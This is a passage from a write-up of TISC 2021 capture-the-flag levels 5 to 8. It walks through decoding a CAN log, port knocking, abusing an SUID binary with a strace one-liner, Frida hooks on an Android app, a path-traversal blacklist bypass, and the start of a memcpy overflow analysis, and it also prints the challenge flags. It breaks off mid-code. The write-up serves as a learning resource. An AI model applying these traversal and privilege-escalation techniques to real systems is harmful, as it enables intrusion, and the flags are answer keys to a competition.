'6E7B6e936C0051']

After a lot of manual copying and pasting, I found that these ASCII characters appeared in the third byte of each instruction's data. Based on this hunch, I wrote another short script to extract and decode these bytes.

can_combinations = dict()
can_count = dict()

encoded = ''
with open('candump.log', 'r') as file:
    while line := file.readline():
        can_id = line[26:29]
        can_data = line[30:].strip()
        if can_id == '0C7':
            encoded += can_data[4:6]

print(bytes.fromhex(encoded).decode('utf-8'))

This produced l1f3_15_wh47_h4pp3n5_wh3n_y0u'r3_bu5y_m4k1n6_07h3r_pl4n5.-j_0_h_n_l_3_n_n_0_n which matched the checksum d6808584f9f72d12096a9ca865924799.

TISC{l1f3_15_wh47_h4pp3n5_wh3n_y0u'r3_bu5y_m4k1n6_07h3r_pl4n5.-j_0_h_n_l_3_n_n_0_n}

Level 6: Knock Knock, Who's There

Domains: Network Forensics, Reverse Engineering

Traffic capture suggests that a server used to store OTP passwords for PALINDROME has been found. Decipher the packets and figure out a way to get in. Move quick, time is of essence.

https://transfer.ttyusb.dev/s4is2/traffic_capture.pcapng

Server at 128.199.211.243

Note: The challenge instance may be reset periodically so do save a copy of any files you might need on your machine.

I was halfway there, but I faced the most mind-bending level yet. I downloaded the massive 614 MB PCAP file containing all kinds of traffic, including SSH, SMB, HTTP, and more. Based on the title of the level and β€œtime is of essence” in the description, I suspected that the challenge involved port knocking. I needed to discover the port knocking sequence needle in the haystack and thereafter use it to access the server at 128.199.211.243. I ran a full nmap scan of the server which returned zero ports – another strong hint that port knocking was the solution.

To start off, I scanned the PCAP with VirusTotal and Suricata, both of which flagged malicious traffic.

08/26/2021-19:47:30.560000  [**] [1:2008705:5] ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (15) [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 192.168.202.68:40111 -> 192.168.23.100:445
08/26/2021-19:47:30.560000  [**] [1:2008715:5] ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (25) [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 192.168.202.68:40111 -> 192.168.23.100:445
08/26/2021-19:47:30.560000  [**] [1:2009247:3] ET SHELLCODE Rothenburg Shellcode [**] [Classification: Executable code was detected] [Priority: 1] {TCP} 192.168.202.68:40111 -> 192.168.23.100:445

At first, I thought I had to extract the binaries sent by the malicious traffic and reverse engineer them, similar to last year's Flare-On Challenge 7. This sent me down a deep, dark rabbit hole in which I attempted to reverse engineer Meterpreter traffic and other payloads. After wasting many hours on reverse engineering, I went back to the port knocking idea. One CTF blogpost suggested that I could use the WireShark filter (tcp.flags.reset eq 1) && (tcp.flags.ack eq 1) to retrieve port knocking sequences. However, this approach failed because in the author's case, the knocked ports responded with a RST, ACK packet whereas for this challenge the knocked ports were completely filtered.

Growing desperate, I noticed that some of the HTTP traffic contained references to the U.S. National CyberWatch Mid-Atlantic Collegiate Cyber Defense Competition (MACCDC) 2012. For example, Network Miner extracted a file named attackerHome.php that included this HTML code:

	<select id='eventSelect' name='eventId'>
		<option value=''>Select an Event...</option>
		<option value='1' >Mid-Atlantic CCDC 2011</option>
		<option value='21' >Cyberlympics - Miami</option>
		<option value='30' >Mid-Atlantic CCDC 2012</option>
 	</select>

Following this lead, I found out that traffic captures for MACCDC 2012 were available online as PCAP files. However, for 2012 alone, the organisers released 16 different PCAP files, each several hundred MBs in size.

With no better ideas, I downloaded every single MACCDC 2012 PCAP file and manually checked each one for matching packets in traffic_capture.pcapng. After several painfully large downloads, I narrowed it down to maccdc2012_00013.pcap.

Next, I used a PCAP diffing script to extract unique packets in traffic_capture.pcapng that did not appear in maccdc2012_00013.pcap. Parsing the two massive files took about half an hour but I got my answer: traffic_capture.pcapng included extra HTTP traffic between 192.168.242.111 and 192.168.24.253.

GET /debug.txt HTTP/1.1
User-Agent: Wget/1.20.3 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 192.168.57.130:21212
Connection: Keep-Alive

HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/3.8.10
Date: Tue, 24 Aug 2021 07:48:38 GMT
Content-type: text/plain
Content-Length: 138
Last-Modified: Tue, 24 Aug 2021 07:43:39 GMT

DEBUG PURPOSES ONLY. CLOSE AFTER USE.
++++++++
5 ports.
++++++++
Account.
++++++++
SSH.
++++++++
End debug. Check and re-enable firewall.

Two things stood out to me. Firstly, the HTTP response suggested that there were 5 ports in the port knocking sequence to open the SSH port. Secondly, the host header 192.168.57.130:21212 did not match the HTTP server IP 192.168.24.253. Perhaps this was a hint about the ports?

I attempted multiple permutations of 192, 168, 57, 130, and 21212 using a port knocking script to no avail. After several more hours sunk into this rabbit hole, I resorted to writing my own diffing script because I realised that the previous PCAP diffing script missed out some packets.

from scapy.all import PcapReader, wrpcap, Packet, NoPayload, TCP


i = 0
with PcapReader('macccdc253.pcap') as maccdc_packets, PcapReader('traffic253.pcap') as traffic_packets:
    for maccdc_packet in maccdc_packets:
        candidate_traffic_packet = traffic_packets.read_packet()
        while maccdc_packet[TCP].payload != candidate_traffic_packet[TCP].payload:
            print("NOMATCH {}".format(i))
            candidate_traffic_packet = traffic_packets.read_packet()
            if TCP not in candidate_traffic_packet:
                print("NOMATCH {}".format(i))
                candidate_traffic_packet = traffic_packets.read_packet()
            i += 1
        i += 1

This new script revealed that there were indeed more unique packets. These turned out to be a series of TCP SYN packets from 192.168.202.95 to 192.168.24.253 followed by an SSH connection!

Port Knocking Packets

Even better, the [PSH, ACK] packet sent from the server after the port knocking sequence contained SSH credentials.

SSH Credentials

This was my ticket. I repeated the port knocking sequence with python .\knock.py <IP ADDRESS> 2928 12852 48293 9930 8283 42069 and I received the packet containing the SSH credentials. The credentials only lasted for a few seconds and changed on each iteration; I probably should have automated the SSH login but manually copying and pasting worked as well.

I logged in as the low-privileged challenjour user. The home folder contained an otpkey executable and secret.txt. secret.txt could only be read by root, but otpkey had the SUID bit set so it could read secret.txt.

I pulled otpkey from the server and decompiled it in IDA. I annotated the pseudocode accordingly:

__int64 __fastcall main(int a1, char **a2, char **a3)
{
  int i; // eax
  const char *encrypted_machine_id_hex; // rax
  int can_open_dest_file; // [rsp+18h] [rbp-78h]
  char *dest_file; // [rsp+20h] [rbp-70h]
  char *source_file_bytes; // [rsp+28h] [rbp-68h]
  char *dest_file_bytes; // [rsp+30h] [rbp-60h]
  char *tmp_otk_file; // [rsp+38h] [rbp-58h]
  const char *source_file; // [rsp+40h] [rbp-50h]
  _BYTE *encrypted_machine_id; // [rsp+48h] [rbp-48h]
  char tmp_otk_dir[16]; // [rsp+50h] [rbp-40h] BYREF
  __int64 v14; // [rsp+60h] [rbp-30h]
  __int64 v15; // [rsp+68h] [rbp-28h]
  __int64 v16; // [rsp+70h] [rbp-20h]
  __int16 v17; // [rsp+78h] [rbp-18h]
  unsigned __int64 v18; // [rsp+88h] [rbp-8h]

  v18 = __readfsqword(0x28u);
  can_open_dest_file = 0;
  dest_file = 0LL;
  source_file_bytes = 0LL;
  dest_file_bytes = 0LL;
  tmp_otk_file = 0LL;
  strcpy(tmp_otk_dir, "/tmp/otk/");
  v14 = 0LL;
  v15 = 0LL;
  v16 = 0LL;
  v17 = 0;
  for ( i = getopt(a1, a2, "hm"); ; i = getopt(a1, a2, "hm") )
  {
    if ( i == -1 )
    {
      if ( a1 == 4 )
        return 0LL;
    }
    else
    {
      if ( i != 109 )                           // 'm' so opt is h instead
      {
        printf("Usage: %s [OPTIONS]\n", *a2);
        puts("Print some text :)n");
        puts("Options");
        puts("=======");
        puts("[-m] curr_location new_location \tMove a file from curr location to new location\n");
        exit(0);
      }
      if ( a1 != 4 )
      {
        puts("[-m] curr_location new_location \tMove file from curr location to new location");
        exit(0);
      }
      source_file = a2[2];
      dest_file = a2[3];
      printf("Requested to move %s to %s.\n", source_file, dest_file);
      if ( (unsigned int)is_alpha(source_file) && (unsigned int)is_alpha(dest_file) )
      {
        if ( (unsigned int)check_needle(source_file) )// check if source file has 'secret.t'
          can_open_dest_file = can_open(dest_file);
        if ( can_open_dest_file )
        {
          source_file_bytes = (char *)read_bytes(source_file);
          dest_file_bytes = (char *)read_bytes(dest_file);
          if ( source_file_bytes && dest_file_bytes )
            write_bytes_to_file(dest_file, source_file_bytes);
        }
        else
        {
          source_file_bytes = (char *)read_bytes(source_file);
          if ( source_file_bytes )
          {
            write_bytes_to_file(dest_file, source_file_bytes);
            chmod(dest_file, 0x180u);
          }
        }
      }
    }
    encrypted_machine_id = encrypt_machine_id();
    if ( encrypted_machine_id )
    {
      encrypted_machine_id_hex = (const char *)bytes_to_hex(encrypted_machine_id);
      strncat(tmp_otk_dir, encrypted_machine_id_hex, 0x20uLL);// appends encrypted machine id to /tmp/otk/
      tmp_otk_file = (char *)read_bytes(tmp_otk_dir);
      if ( tmp_otk_file )
        printf("%s", tmp_otk_file);
    }
    else
    {
      puts("An error occurred.");
    }
    free_wrapper(encrypted_machine_id);
    free_wrapper(tmp_otk_file);
    if ( !can_open_dest_file )
      break;
    write_bytes_to_file(dest_file, dest_file_bytes);// restores dest file...
    free_wrapper(source_file_bytes);
    free_wrapper(dest_file_bytes);
    dest_file = 0LL;
  }
  return 0LL;
}

otpkey moved a file from arg1 to arg2. If arg1 was secret.txt, the program wrote the contents of secret.txt to the destination file, but before exiting it would also restore the destination file's original contents, preventing me from reading the flag. The section starting from encrypted_machine_id = encrypt_machine_id(); looked more intresting. It attempted to read /tmp/otk/<encrypt_machine_id()> and print the contents of the file. Since this occurred before it restored the destination file, I could theoretically write secret.txt to the OTK file and print its contents to get the flag!

What string did encrypt_machine_id generate?

_BYTE *encrypt_machine_id()
{
  size_t v0; // rax
  size_t ciphertext_len; // rax
  int i; // [rsp+0h] [rbp-80h]
  void *machine_id; // [rsp+8h] [rbp-78h]
  time_t current_time_reduced; // [rsp+10h] [rbp-70h]
  char *_etc_machine_id; // [rsp+18h] [rbp-68h]
  _BYTE *machine_id_unhexed; // [rsp+20h] [rbp-60h]
  _BYTE *encrypted_machine_id; // [rsp+28h] [rbp-58h]
  char *ciphertext; // [rsp+38h] [rbp-48h]
  char plaintext[8]; // [rsp+46h] [rbp-3Ah] BYREF
  __int16 v11; // [rsp+4Eh] [rbp-32h]
  __int64 v12[2]; // [rsp+50h] [rbp-30h] BYREF
  __int64 md5_hash[4]; // [rsp+60h] [rbp-20h] BYREF

  md5_hash[3] = __readfsqword(0x28u);
  *(_QWORD *)plaintext = 0LL;
  v11 = 0;
  v12[0] = 0x13111D5F1304155FLL;
  v12[1] = 0x14195D151E1918LL;
  encrypted_machine_id = calloc(0x10uLL, 1uLL);
  md5_hash[0] = 0LL;
  md5_hash[1] = 0LL;
  current_time_reduced = time(0LL) / 10;
  snprintf(plaintext, 0xAuLL, "%ld", current_time_reduced);
  v0 = strlen(plaintext);
  ciphertext = (char *)calloc(4 * v0, 1uLL);
  RC4("O).2@g", plaintext, ciphertext);
  strlen(plaintext);
  ciphertext_len = strlen(ciphertext);
  MD5(ciphertext, ciphertext_len, md5_hash);
  free_wrapper(ciphertext);
  _etc_machine_id = xor_0x70((const char *)v12);// xor_0x70
  machine_id = read_bytes(_etc_machine_id);     // fb60706a312b4ddab835445d28153227
  free_wrapper(_etc_machine_id);
  if ( !machine_id )
    return 0LL;
  machine_id_unhexed = (_BYTE *)read_hex_string(machine_id);
  if ( !machine_id_unhexed || !encrypted_machine_id )
    return 0LL;
  for ( i = 0; i <= 15; ++i )
    encrypted_machine_id[i] = machine_id_unhexed[i] ^ *((_BYTE *)md5_hash + i);// xor with each byte of weak md5_hash
  free_wrapper(machine_id_unhexed);
  return encrypted_machine_id;
}

By following the pseudocode, I deduced that the function generated the one-time key using XOR(MD5(RC4(str(time(0LL) / 10, "O).2@g")), machine-id). Since it divided time(0) by 10, each one-time key lasted for ten seconds.

At first, I tried generating the one-time key myself but the output did not match anthing in /tmp/otk. After several more failed attempts, I realised that I could simply use strace to dynamically read otpkey's system calls. When otpkey attempted to read /tmp/otk/<encrypt_machine_id()>, strace hooked the read system call and printed its file path argument.

Since the server had already installed strace, I crafted a Bash one-liner to do this: dest=$(strace ./otpkey -m secret.txt /tmp/ptl 2>&1 | grep /tmp/otk | cut -c 19-59);./otpkey -m secret.txt $dest. With that, I solved the challenge.

TISC{v3RY|53CrE+f|@G}

Level 7: The Secret

Domains: Steganography, Android Security, Cryptography

Our investigators have recovered this email sent out by an exposed PALINDROME hacker, alias: Natasha. It looks like some form of covert communication between her and PALINDROME.

Decipher the communications channel between them quickly to uncover the hidden message, before it is too late.

Submit your flag in the format: TISC{flag found}.

Bye for now.eml

Bye for now.eml contained the following text:


GIB,



I=E2=80=99ll be away for a while. Don=E2=80=99t miss me. You have my pictur=
e :D

Hope the distance between us could help me see life from a different
perspective. Sometimes, you will find the most valuable things hidden in
the least significant places.





Natasha

My hex editor revealed a large base64 string appended as a HTML comment. Decoding the string produced a PNG image file of Natasha Romanoff from the Avengers. Based on the β€œleast significant places” hint from the email message, I suspected that the image embedded data using least sigificant byte steganography. I confirmed this with stegsolve as the plane 0 filters displayed the tell-tale β€œstatic” at the top of the image.

Stegsolve Output

I used the stegonline tool to retrieve the bytes, which formed the string https://transfer.ttyusb.dev/8S8P76hlG6yEig2ywKOiC6QMak4iGaKc/data.zip.

The link downloaded a password-protected ZIP file containing an app.apk file. The ZIP file included an extra comment at the bottom: LOBOBMEM MULEBES ULUD RIKIF GNIKCARC EROFEB NIAGA KNIHT. I reversed the string and got THINK AGAIN BEFORE CRACKING FIKIR DULU SEBELUM MEMBOBOL.

Despite such fine advice, I responded in a predictable manner:

I Can't Read

After wasting several hours trying to guess and crack the password, I came across a useful CTF guide that revealed that ZIPs could be pseudo-encrypted by setting the encryption flag without actually encrypting the data. I modified the corresponding byte in my hex editor and lo and behold, I opened the ZIP without a password!

I installed the APK on my test Android phone and opened it.

The Secret App

Clicking β€œI'M IN POSITION” caused the application to close because the time, latitude, longitude, and data were invalid.

I decompiled the APK with jadx and noticed that the MainActivity function initialised the Myth class, which then executed System.loadLibrary("native-lib"). This corresponded with libnative-lib.so in the APK's lib folder, so I decompiled it IDA. The library exported two interesting functions: Java_mobi_thesecret_Myth_getTruth and Java_mobi_thesecret_Myth_getNextPlace.

Java_mobi_thesecret_Myth_getTruth performed a large number of _mm_shuffle_epi32 decryption routines before returning some plaintext which I suspected was the flag. It also verified that the second argument matched GIB's phone:

v7 = (const char *)(*(int (__cdecl **)(int *, int, char *))(*a4 + 676))(a4, a7, &v74);
v8 = strcmp(v7, "GIB's phone") == 0;

Meanwhile, Java_mobi_thesecret_Myth_getNextPlace checked latitude and longitude values:

if ( *(double *)&a5 > 103.7899 || *(double *)&a4 < 1.285 || *(double *)&a4 > 1.299 || *(double *)&a5 < 103.78 )
{
v10 = (*(int (__cdecl **)(int, const char *))(*(_DWORD *)a1 + 668))(a1, "Error: Not near. Try again.");
}

It also compared the second argument to a matching time value:

    if ( v7 == 22 && v8 > 30 || v7 == 23 && v8 < 15 )
    {
      std::string::append((int)v20, (int)&all, 71, 1u);
      std::string::append((int)v20, (int)&all, 83, 1u);
      std::string::append((int)v20, (int)&all, 83, 1u);
      std::string::append((int)v20, (int)&all, 79, 1u);
      std::string::append((int)v20, (int)&all, 82, 1u);
      std::string::append((int)v20, (int)&all, 25, 1u);
      std::string::append((int)v20, (int)&all, 14, 1u);
      std::string::append((int)v20, (int)&all, 14, 1u);
      std::string::append((int)v20, (int)&all, 83, 1u);
      std::string::append((int)v20, (int)&all, 13, 1u);
      std::string::append((int)v20, (int)&all, 76, 1u);
      std::string::append((int)v20, (int)&all, 68, 1u);
      std::string::append((int)v20, (int)&all, 14, 1u);
      std::string::append((int)v20, (int)&all, 47, 1u);
      std::string::append((int)v20, (int)&all, 32, 1u);
      std::string::append((int)v20, (int)&all, 43, 1u);
      std::string::append((int)v20, (int)&all, 40, 1u);
      std::string::append((int)v20, (int)&all, 45, 1u);
      std::string::append((int)v20, (int)&all, 35, 1u);
      std::string::append((int)v20, (int)&all, 49, 1u);
      std::string::append((int)v20, (int)&all, 46, 1u);
      std::string::append((int)v20, (int)&all, 44, 1u);
      std::string::append((int)v20, (int)&all, 36, 1u);
      std::string::append((int)v20, (int)&all, 50, 1u);
      std::string::append((int)v20, (int)&all, 83, 1u);
      std::string::append((int)v20, (int)&all, 64, 1u);
      std::string::append((int)v20, (int)&all, 75, 1u);
      std::string::append((int)v20, (int)&all, 74, 1u);
      std::string::append((int)v20, (int)&all, 68, 1u);
      std::string::append((int)v20, (int)&all, 81, 1u);
      if ( (v20[0] & 1) != 0 )
        v9 = (char *)v21;
      else
        v9 = (char *)v20 + 1;
      v11 = (*(int (__cdecl **)(int, char *))(*(_DWORD *)a1 + 668))(a1, v9);
    }
    else
    {
      v11 = (*(int (__cdecl **)(int, const char *))(*(_DWORD *)a1 + 668))(a1, "Error: Wrong time. Try again.");
    }

Next, I grepped through the decompiled Java code and found that getTruth and getNextPlace were called in f/a/b.java:

    q.a(new g(0, "http://worldtimeapi.org/api/timezone/Etc/UTC", null, new c(mainActivity, textView), new f(textView)));
    String str2 = mainActivity.u;
    boolean z = true;
    if (!(str2 == null || str2.length() == 0)) {
        String nextPlace = mainActivity.y.getNextPlace(mainActivity.u, mainActivity.s, mainActivity.t);
        mainActivity.v = nextPlace;
        if (nextPlace == null || nextPlace.length() == 0) {
            mainActivity.x();
        } else {
            if (c.b.a.b.a.H(mainActivity.v, "Error", false, 2)) {
                mainActivity.x();
                context = mainActivity.getApplicationContext();
                str = mainActivity.v;
            } else {
                p q2 = f.q(mainActivity);
                View findViewById4 = mainActivity.findViewById(R.id.data_text);
                c.c(findViewById4, "findViewById(R.id.data_text)");
                TextView textView2 = (TextView) findViewById4;
                q2.a(new k(0, mainActivity.v, new g(mainActivity, textView2), new e(textView2)));
                String str3 = mainActivity.w;
                if (!(str3 == null || str3.length() == 0) || mainActivity.x != 0) {
                    int i2 = mainActivity.x;
                    if (i2 == 1) {
                        View findViewById5 = mainActivity.findViewById(R.id.flag_value);
                        c.c(findViewById5, "findViewById(R.id.flag_value)");
                        TextView textView3 = (TextView) findViewById5;
                        String string = Settings.Global.getString(mainActivity.getContentResolver(), "device_name");
                        if (!(string == null || string.length() == 0)) {
                            z = false;
                        }
                        if (z) {
                            string = Settings.Global.getString(mainActivity.getContentResolver(), "bluetooth_name");
                        }
                        Myth myth = mainActivity.y;
                        String str4 = mainActivity.w;
                        c.c(string, "user");
                        String truth = myth.getTruth(str4, string);
                        if (c.b.a.b.a.H(truth, "Error", false, 2)) {
                            Toast.makeText(mainActivity.getApplicationContext(), truth, 0).show();
                            return;
                        } else {
                            textView3.setText(truth);
                            return;
                        }

By tracing back variables using the jadx GUI β€œFind Usage” option, I reconstructed the flow of the application. mainActivity.y.getNextPlace took in the current timestamp from http://worldtimeapi.org/api/timezone/Etc/UTC(parsed to HH:MM) and the latitude and longitude, returning a link. After that, the application called myth.getTruth with str4 and the current username as arguments. Since the IDA decompilation already revealed that the user value needed to be GIB's phone, I only needed to find out the expected value of str4.

The decompiled Java code showed that String str4 = mainActivity.w; and mainActivity.w was set in f/a/g.java by the a function:

    public final void a(Object obj) {
        MainActivity mainActivity = this.a;
        TextView textView = this.f2157b;
        String str = (String) obj;
        int i = MainActivity.q;
        c.d(mainActivity, "this$0");
        c.d(textView, "$dataTextView");
        try {
            c.c(str, "response");
            int e2 = e.e(str, "tgme_page_description", 0, true, 2);
            String str2 = (String) e.g(str.subSequence(e2, e.b(str, "</div>", e2, true)), new String[]{">"}, false, 0, 6).get(1);
            mainActivity.w = str2;
            textView.setText(str2);
            mainActivity.x = 1;
        } catch (Exception unused) {
            mainActivity.x = -1;
        }
    }

I looked up tgme_page_description and learned that this was the HTML class for the description text in a Telegram group page.

I moved on to dynamic instrumentation with Frida and wrote a quick script to trigger getNextPlace directly in the application with the correct arguments.

function exploit() {
    // Check if frida has located the JNI
    if (Java.available) {
        // Switch to the Java context
        Java.perform(function() {
            const Myth = Java.use('mobi.thesecret.Myth');
            var myth = Myth.$new();
            var string_class = Java.use("java.lang.String");

            var out = string_class.$new("");
            var timestamp = string_class.$new("22:31");

            out = myth.getNextPlace(timestamp, 1.286, 103.785);
            console.log(out)
        }
    )}
}

I executed this script via my connected computer with frida -U 'The Secret' -l exploit.js. To my pleasant surprise, getNextPlace returned a Telegram link: https://t.me/PALINDROMEStalker. The description box displayed the string I was looking for: ESZHUUSHCAJGKOBPHFAMVYUIFHFYFTVQKGFGZPNUBV.

Telegram Group

Now all I had to do was to feed getTruth the correct arguments.

function exploit() {

    // Check if frida has located the JNI
    if (Java.available) {
        // Switch to the Java context
        Java.perform(function() {
            const Myth = Java.use('mobi.thesecret.Myth');
            var myth = Myth.$new();
            var string_class = Java.use("java.lang.String");

            var out = string_class.$new("");
            var timestamp = string_class.$new("22:31");

            var tele_description = string_class.$new("ESZHUUSHCAJGKOBPHFAMVYUIFHFYFTVQKGFGZPNUBV");

            var user = string_class.$new("GIB's phone");

            out = myth.getNextPlace(timestamp, 1.286, 103.785);
            console.log(out)

            out = myth.getTruth(tele_description, user);
            console.log(out)
        }
    )}
}

The script printed the flag and completed this challenge.

TISC{YELENAFOUNDAWAYINSHEISOUREYESANDEARSWITHIN}

Level 8: Get-Shwifty

Domains: Web, Reverse Engineering, Pwn

We have managed to track down one of PALINDROME's recruitment operations!

Our intel suggest that they have defaced our website and insert their own recruitment test.

Pass their test and get us further into their organization!

We are counting on you!

The following links are mirrors of each other, flags are the same:

http://tisc21c-v3clxv6ecfdrvyrzn5mz7mchv8v7wcpv.ctf.sg:42651

http://tisc21c-8pz0kdhumzaj1lthraa6tm6t27righ8y.ctf.sg:42651

http://tisc21c-wwhvyoobqg08oegfsdvnmcflgfsbx0xd.ctf.sg:42651

NOTE: THE CHALLENGE DOES NOT INVOLVE EXTERNAL LINKS THAT MAY OR MAY NOT BE FOUND IN THE PROVIDED WEBSITE.

I finally reached the Elite Three. From this point onwards, the level of difficulty racheted up greatly and took significant effort to crack. I groaned internally when I saw that Level 8 was a Pwn challenge: while I understood the basics of Windows binary exploitation, I lacked confidence in Linux exploitation and had never completed a Pwn CTF challenge before. Nevertheless, this was the only thing standing in the way of the first $10k.

I opened the link to the hacked website.

Hacked Page

I inspected the HTML source code and noticed a commented-out Find out more about the PALINDROME link. The link redirected to /hint/?hash=aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d which contained a single picture.

Hint

What other hint hash had I found...? I began fuzzing the hash query parameter and noticed that hash=./aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d returned the same picture. This suggested a file traversal vulnerability. However, attempting to go straight to ../../../../etc/passwd failed. I worked incrementally by traversing backwards one directory at a time and discovered that the application blacklisted three consecutive traversals (../../../). To bypass this, I simply used ../.././../ which successfully allowed me to access any file on the server! The page returned the file data as a base64-encoded image source.

<!DOCTYPE html>
<html lang="en">
<head>
<title>lol</title>
</head>
<body>

<img src='data:image/png;base64,<BASE64 ENCODED FILE DATA>'>

Unfortunately, I did not find any interesting information in /etc/passwd or /etc/hosts. Eventually, I decided to check the source code of the website's pages which turned out to be PHP. I struck gold with /var//www/html/hint/index.php:

<!DOCTYPE html>
<html lang="en">
<head>
<title>lol</title>
</head>
<body>

<?php
    if($_GET["hash"]){
        echo "<img src='data:image/png;base64,".base64_encode(file_get_contents($_GET["hash"]))."'>";
        die();
    }else{
        header("Location: /hint?hash=aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d");
        die();
    }

    // to the furure me: this is the old directory listing
    // 
    // hint:
    // total 512
    // drwxrwxr-x 2 user user   4096 Jun 16 21:52 ./
    // drwxr-xr-x 5 user user   4096 Jun 16 21:11 ../
    // -rw-rw-r-- 1 user user     18 Jun 16 22:12 68a64066b1f37468f5191d627473891ac0ef9243
    // -rw-rw-r-- 1 user user 489519 Jun 16 15:47 aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d
    // -rw-rw-r-- 1 user user  15710 Jun 16 21:52 b5dbffb4375997bfcba86c4cd67d74c7aef2b14e
    // -rw-r--r-- 1 user user    551 Jun 16 21:30 index.php
?>

</body>
</html>

Following the directory listing, I accessed two new files.

68a64066b1f37468f5191d627473891ac0ef9243 was a text file that said i am also on 53619.

b5dbffb4375997bfcba86c4cd67d74c7aef2b14e contained another directory listing.

bin:
total 28
-rwsrwxr-x 1 root root 22752 Aug 19 15:59 1adb53a4b156cef3bf91c933d2255ef30720c34f

I proceeded to leak /var/www/html/bin/1adb53a4b156cef3bf91c933d2255ef30720c34f which turned out to be an ELF executable.

Here it comes

As described in the text file earlier, this binary ran on port 53619 on the server. I executed it locally and was greeted by a large alien head.

        ___          
    . -^   `--,      
   /# =========`-_   
  /# (--====___====\ 
 /#   .- --.  . --.| 
/##   |  * ) (   * ),
|##   \    /\ \   / |
|###   ---   \ ---  |
|####      ___)    #|
|######           ##|
 \##### ---------- / 
  \####           (  
   `\###          |  
     \###         |  
      \##        |   
       \###.    .)   
        `======/     
SHOW ME WHAT YOU GOT!!!


////////////// MENU //////////////
//  0. Help                     //
//  1. Do Sanity Test           //
//  2. Get Recruited            //
//  3. Exit Program             //
//////////////////////////////////

The β€œDo Sanity Test” option prompted me for input.

To pass the sanity test, you just need to give a sane answer to show that you are not insane!
Your answer: 

After entering some random text, I tried the β€œGet Recruited” option. However, the application printed the error message You must be insane! Complete the Sanity Test to prove your sanity first!.

To figure out what was going on, I decompiled the application in IDA and annotated the pseudocode for the β€œDo Sanity Test” option.

__int64 sanity_test()
{
  void *v0; // rsp
  void *v1; // rsp
  void *v2; // rsp
  int v4; // [rsp+14h] [rbp-24h] BYREF
  void *s; // [rsp+18h] [rbp-20h]
  void *src; // [rsp+20h] [rbp-18h]
  void *dest; // [rsp+28h] [rbp-10h]
  unsigned __int64 v8; // [rsp+30h] [rbp-8h]

  v8 = __readfsqword(0x28u);
  ++dword_5580E5357280;
  v4 = 32;
  v0 = alloca(48LL);
  s = (void *)(16 * (((unsigned __int64)&v4 + 3) >> 4));
  v1 = alloca(48LL);
  src = s;
  v2 = alloca(48LL);
  dest = s;
  memset(s, 0, v4);
  memset(src, 0, v4);
  memset(dest, 0, v4);
  std::operator>><char,std::char_traits<char>>(&std::cin, src);
  memcpy(dest, src, v4);
  memcpy(s, dest, v4 / 2);
  sanity_test_input = malloc(v4 - 1);
  memcpy(sanity_test_input, s, v4 - 1);
  sanity_test_result = *((_BYTE *)s + v4 - 1);
  return 0LL;
}

Following a series of three suspicious memcpys, the function set sanity_test_result to the 32nd byte of the input. Next, the β€œGet Recruited” function checked if sanity_test_result && !(unsigned int8)shl_sanity_test_result_7(). In other words, to pass the sanity test, I had to enter input such that sanity_test_result != 0 and (unsigned __int8)(sanity_test_result << 7) = 0. I could pass this check rather easily with an even number, such as 0x40 (@ in ASCII). Now, instead of displaying an error message, the β€œGet Recruited” option prompted me for a different set of inputs.

To get recruited, you need to provide the correct passphrase for the Cromulon.
Passphrase: AAA
Your passphrase appears to be incorrect.
You are allowed a few tries to modify your passphrase.
Use the following functions to provide the correct answer to get recruited.
1. Append String
2. Replace Appended String
3. Modify Appended String
4. Show what you have for the Cromulon currently
5. Submit
6. Back

The various options looked ripe for some kind of use-after-free vulnerability... except that there were not a lot of frees going on. The binary handled the appended strings using a linked list and I could not find any issues in the memory management. I also suspected that it suffered from a format string bug because entering %x%x%x for the passphrase caused the β€œShow what you have for the Cromulon currently” option to print e8e8e8e8. However, after further reverse engineering, I realised I misunderstood the source of the strange output. It turned out that when appending, replacing, or modifying a string, the user's input would be XORed with the input from the sanity test before it was stored in the linked list. For example, since I entered a series of @s for the the sanity test, @@ XOR %x == e8.

char __fastcall xor_passphrase_with_sanity_input(_BYTE *passphrase_data)
{
  char result; // al
  _BYTE *v2; // rax
  _BYTE *passphrase_data_2; // [rsp+0h] [rbp-18h]
  _BYTE *v4; // [rsp+10h] [rbp-8h]

  passphrase_data_2 = passphrase_data;
  v4 = sanity_test_input;
  result = *passphrase_data;
  if ( *passphrase_data )
  {
    result = *(_BYTE *)sanity_test_input;
    if ( *(_BYTE *)sanity_test_input )
    {
      do
      {
        if ( !*v4 )
          v4 = sanity_test_input;
        v2 = v4++;
        *passphrase_data_2++ ^= *v2;
        result = *passphrase_data_2 != 0;
      }
      while ( *passphrase_data_2 );
    }
  }
  return result;
}

This behaviour resembled an information leak, so perhaps the actual vulnerability occurred in the sanity test. Remember the suspicious series of memcpys?

I started the application in gdb with the pwndbg extension and entered a long series of As for the sanity test. I got a crash and traced it back to the first memcpy. The arguments to memcpy were overwritten by my input:

dest: 0x4141414141414141 ('AAAAAAAA')
src: 0x4141414141414141 ('AAAAAAAA')
n: 0x41414141 ('AAAA')

This looked like a powerful write-what-where gadget! However, exploitation would not be easy. I ran checksec and confirmed that all possible memory protections were turned on, therefore ruling out a simple return pointer overwrite exploit.

pwndbg> checksec
[*] '/home/kali/Desktop/tisc/8_get_shwifty/1adb53a4b156cef3bf91c933d2255ef30720c34f'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

I took a closer look at sanity test pseudocode to figure out another way to exploit this overwrite.

void *v0; // rsp
void *v1; // rsp
void *v2; // rsp
int v4; // [rsp+14h] [rbp-24h] BYREF
void *s; // [rsp+18h] [rbp-20h]
void *src; // [rsp+20h] [rbp-18h]
void *dest; // [rsp+28h] [rbp-10h]
unsigned __int64 v8; // [rsp+30h] [rbp-8h]

v8 = __readfsqword(0x28u);
++dword_5580E5357280;
v4 = 32;
v0 = alloca(48LL);
s = (void *)(16 * (((unsigned __int64)&v4 + 3) >> 4));
v1 = alloca(48LL);
src = s;
v2 = alloca(48LL);
dest = s;
memset(s, 0, v4);
memset(src, 0, v4);
